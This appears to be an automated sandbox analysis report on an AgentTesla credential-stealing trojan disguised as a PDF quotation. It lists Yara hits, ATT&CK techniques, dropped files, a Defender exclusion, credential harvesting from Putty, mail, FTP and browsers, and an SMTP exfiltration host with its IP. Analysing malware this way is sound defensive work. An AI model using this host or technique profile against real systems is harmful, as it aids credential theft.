                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6936, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    1
                    Scheduled Task/Job
                    11
                    Process Injection
                    1
                    Masquerading
                    2
                    OS Credential Dumping
                    311
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job
                    Boot or Logon Initialization Scripts1
                    Scheduled Task/Job
                    11
                    Disable or Modify Tools
                    1
                    Credentials in Registry
                    1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion
                    Security Account Manager131
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares2
                    Data from Local System
                    Automated Exfiltration1
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer11
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items13
                    Software Packing
                    DCSync114
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 652379 Sample: UN-Quotation 70000000187366... Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for dropped file 2->41 43 13 other signatures 2->43 7 UN-Quotation 70000000187366444_PDF.exe 7 2->7         started        process3 file4 27 C:\Users\user\AppData\Roaming\XrgnLg.exe, PE32 7->27 dropped 29 C:\Users\user\...\XrgnLg.exe:Zone.Identifier, ASCII 7->29 dropped 31 C:\Users\user\AppData\Local\...\tmp25F3.tmp, XML 7->31 dropped 33 UN-Quotation 70000...7366444_PDF.exe.log, ASCII 7->33 dropped 45 Adds a directory exclusion to Windows Defender 7->45 11 UN-Quotation 70000000187366444_PDF.exe 2 7->11         started        15 powershell.exe 24 7->15         started        17 powershell.exe 25 7->17         started        19 schtasks.exe 1 7->19         started        signatures5 process6 dnsIp7 35 mail.bonsa.lt 193.46.84.142, 49741, 587 BST-LT Lithuania 11->35 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->47 49 Tries to steal Mail credentials (via file / registry access) 11->49 51 Tries to harvest and steal ftp login credentials 11->51 53 Tries to harvest and steal browser information (history, passwords, etc) 11->53 21 conhost.exe 15->21         started        23 conhost.exe 17->23         started        25 conhost.exe 19->25         started        signatures8 process9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    UN-Quotation 70000000187366444_PDF.exe38%VirustotalBrowse
                    UN-Quotation 70000000187366444_PDF.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    UN-Quotation 70000000187366444_PDF.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\XrgnLg.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\XrgnLg.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SourceDetectionScannerLabelLinkDownload
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    SourceDetectionScannerLabelLink
                    mail.bonsa.lt0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.carterandcone.comn-u0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.zhongyicts.com.cnn-u0%URL Reputationsafe
                    http://fontfabrik.comH:0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                    http://www.carterandcone.comue4B0%Avira URL Cloudsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.net8bX0%Avira URL Cloudsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.carterandcone.com:0%Avira URL Cloudsafe
                    http://www.sandoll.co.krcom0%URL Reputationsafe
                    http://www.carterandcone.com.HB0%Avira URL Cloudsafe
                    http://www.sajatypeworks.comY0%Avira URL Cloudsafe
                    http://www.fontbureau.commsd0%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.carterandcone.como.HB0%Avira URL Cloudsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.carterandcone.comQ0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.carterandcone.como.0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.zhongyicts.com.cnue4B0%Avira URL Cloudsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    http://www.carterandcone.coma0%URL Reputationsafe
                    http://www.fontbureau.comcomd0%URL Reputationsafe
                    https://oVr11J0CkkX1DVO37.net0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn8OX0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.carterandcone.comv0%URL Reputationsafe
                    http://mail.bonsa.lt0%Avira URL Cloudsafe
                    http://en.w0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://lAnHfH.com0%Avira URL Cloudsafe
                    http://www.fontbureau.comcomF0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.founder.com.cn/cn/jBu0%Avira URL Cloudsafe
                    http://www.sandoll.co.krim0%URL Reputationsafe
                    http://www.tiro.comNorm0%Avira URL Cloudsafe
                    http://www.fontbureau.comals0%URL Reputationsafe
                    http://www.fontbureau.comalic0%URL Reputationsafe
                    http://www.goodfont.co.krfk60%Avira URL Cloudsafe
                    http://www.typography.netiv0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn#0%URL Reputationsafe
                    http://www.carterandcone.comn-uFi0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.bonsa.lt
                    193.46.84.142
                    truetrueunknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://www.fontbureau.com/designersGUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.carterandcone.comn-uUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers/?UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.zhongyicts.com.cnn-uUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://fontfabrik.comH:UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251850802.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251932047.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260487275.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.ipify.org%%startupfolder%UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            low
                            http://www.carterandcone.comue4BUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.goodfont.co.krUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sajatypeworks.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.typography.net8bXUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.typography.netDUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/cTheUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.263325743.000000000558C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248676313.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248638895.0000000005584000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.com:UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sandoll.co.krcomUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.com.HBUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sajatypeworks.comYUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.commsdUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.295386008.0000000005580000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303672867.0000000005580000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.como.HBUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comQUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.sandoll.co.krUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.urwpp.deDPleaseUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.zhongyicts.com.cnUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersC8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.carterandcone.como.UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253046638.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sakkal.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnue4BUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ipify.org%UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  low
                                  http://www.fontbureau.com/designerssUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257985084.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.carterandcone.comaUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers)8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260274303.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.comcomdUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://oVr11J0CkkX1DVO37.netUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514197510.000000000313C000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514154750.0000000003129000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cn8OXUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comvUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://mail.bonsa.ltUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://en.wUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253180685.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cnUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258973602.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258918421.00000000055C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://lAnHfH.comUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers48UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.267126818.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257743913.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257514571.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257563714.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.comcomFUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers#UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.259916089.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
